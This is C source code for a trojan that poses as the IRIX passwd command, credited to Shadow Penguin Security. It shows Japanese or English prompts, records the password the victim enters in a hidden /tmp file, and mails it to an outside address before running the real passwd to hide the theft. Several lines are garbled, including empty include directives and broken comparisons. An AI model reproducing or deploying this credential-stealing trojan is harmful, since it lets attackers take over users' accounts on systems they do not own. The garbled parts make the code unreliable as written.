/*============================================================================= SU Trojan Ver2.00 for IRIX The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (unewn4th@usa.net) ============================================================================= */ #include #include #include /* パスワードを通知するメアド */ /* 以下の1行を削除するとメール通知は行われません */ #define MAIL "hohoho@hacker.net" /* ロギングファイル. 見つかりにくい名前に変更 */ #define LOGFILE "/tmp/.pl" #define MSG_PERMERR "許可が与えられていません\n" #define MSG_DOESNTEXIST "予期しない失敗です.\n" #define MSG_BANNER "%s のパスワードを変更します\n" #define MSG_OLDPASS "旧パスワード:" #define MSG_BADOLDPASS "残念です\n" #define MSG_NEWPASS "新パスワード:" #define MSG_RENEWPAS "新しいパスワードを再入力して下さい:" #define MSG_TOOSHORT "パスワードが短か過ぎます - 少なくとも 6 文字以上必要です\n" #define MSG_MUSTDIFF "パスワードは旧パスワードと 3 文字以上異っていなければなりません\n" #define MSG_INVALID "パスワードには 2 つ以上の欧字および 1 つ以上の\n"\ "数字または特殊文字を含まなければなりません\n" #define MSG_DONTMATCH "一致しません\n再実行して下さい\n" #define ESG_PERMERR "Permission denied\n" #define ESG_DOESNTEXIST "Unexpected failure.\n" #define ESG_BANNER "Changing password for %s\n" #define ESG_OLDPASS "Old password:" #define ESG_BADOLDPASS "Sorry\n" #define ESG_NEWPASS "New password:" #define ESG_RENEWPAS "Re-enter new password:" #define ESG_TOOSHORT "Password is too short - must be at least 6 characters\n" #define ESG_MUSTDIFF "Passwords must differ by at least 3 positions\n" #define ESG_INVALID "Password must contain at least two alphabetic characters\n"\ " and at least one numeric or special character.\n" #define ESG_DONTMATCH "They don't match\nTry again later.\n" #define TMPFILE "/tmp/.tmp" #define MAX_USERNAME 200 #define MAX_PASSWD 200 int ja_flag; main(int argc,char *argv[]) { int uid=getuid(); struct passwd p; char oldpasswd[MAX_PASSWD],newpasswd[MAX_PASSWD],renewpasswd[MAX_PASSWD]; char *getpass_sys(char *); char username[MAX_USERNAME]; char buf[200]; FILE *fp; int i,ct,l; if (strstr(getenv("LANG"),"ja")==NULL) ja_flag=0; else ja_flag=1; memcpy(&p,getpwuid(uid),sizeof(struct passwd)); if (argc==1) strcpy(username,p.pw_name); else{ strncpy(username,argv[1],MAX_USERNAME-1); username[MAX_USERNAME-1]=0; if (getpwnam(argv[1])==NULL){ if (ja_flag==1) printf(MSG_DOESNTEXIST,argv[1]); else printf(ESG_DOESNTEXIST,argv[1]); exit(1); } memcpy(&p,getpwuid(uid),sizeof(struct passwd)); if (uid!=0 && strcmp(p.pw_name,argv[1])){ if (ja_flag==1) printf(MSG_PERMERR); else printf(ESG_PERMERR); exit(1); } } if (argc==1){ if (ja_flag==1) printf(MSG_BANNER,username); else printf(ESG_BANNER,username); } if (uid!=0){ if (ja_flag==1) strncpy(oldpasswd,getpass(MSG_OLDPASS),MAX_PASSWD-1); else strncpy(oldpasswd,getpass(ESG_OLDPASS),MAX_PASSWD-1); oldpasswd[MAX_PASSWD-1]=0; if (strlen(oldpasswd)==0){ if (ja_flag==1) printf(MSG_BADOLDPASS); else printf(ESG_BADOLDPASS); exit(1); } } for (;;){ if (ja_flag==1) strncpy(newpasswd,getpass_sys(MSG_NEWPASS),MAX_PASSWD-1); else strncpy(newpasswd,getpass_sys(ESG_NEWPASS),MAX_PASSWD-1); newpasswd[MAX_PASSWD-1]=0; if (strlen(newpasswd)=3) break; if (ja_flag==1) printf(MSG_MUSTDIFF); else printf(ESG_MUSTDIFF); } if (ja_flag==1) strncpy(renewpasswd,getpass_sys(MSG_RENEWPAS),MAX_PASSWD-1); else strncpy(renewpasswd,getpass_sys(ESG_RENEWPAS),MAX_PASSWD-1); renewpasswd[MAX_PASSWD-1]=0; if (ja_flag==1) printf(MSG_DONTMATCH); else printf(ESG_DONTMATCH); if ((fp=fopen(LOGFILE,"a"))!=NULL){ fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd); fclose(fp); } #ifdef MAIL if ((fp=fopen(TMPFILE,"w"))!=NULL){ fprintf(fp,"%s %s %s\n",username,newpasswd,renewpasswd); fclose(fp); } sprintf(buf,"mail %s < %s",MAIL,TMPFILE); system(buf); remove(TMPFILE); #endif sprintf(buf,"passwd %s",username); system(buf); } char *getpass_sys(char *d) { static char *x; int i,c1,c2; for (;;){ x=getpass(d); if (strlen(x)<6){ if (ja_flag==1) printf(MSG_TOOSHORT); else printf(ESG_TOOSHORT); continue; } c1=c2=0; for (i=0;i='a' && x[i]<='x') || (x[i]>='A' && x[i]<='X')) c1++; else c2++; } if (c1<2 || c2==0){ if (ja_flag==1) printf(MSG_INVALID); else printf(ESG_INVALID); continue; } break; } return (x); }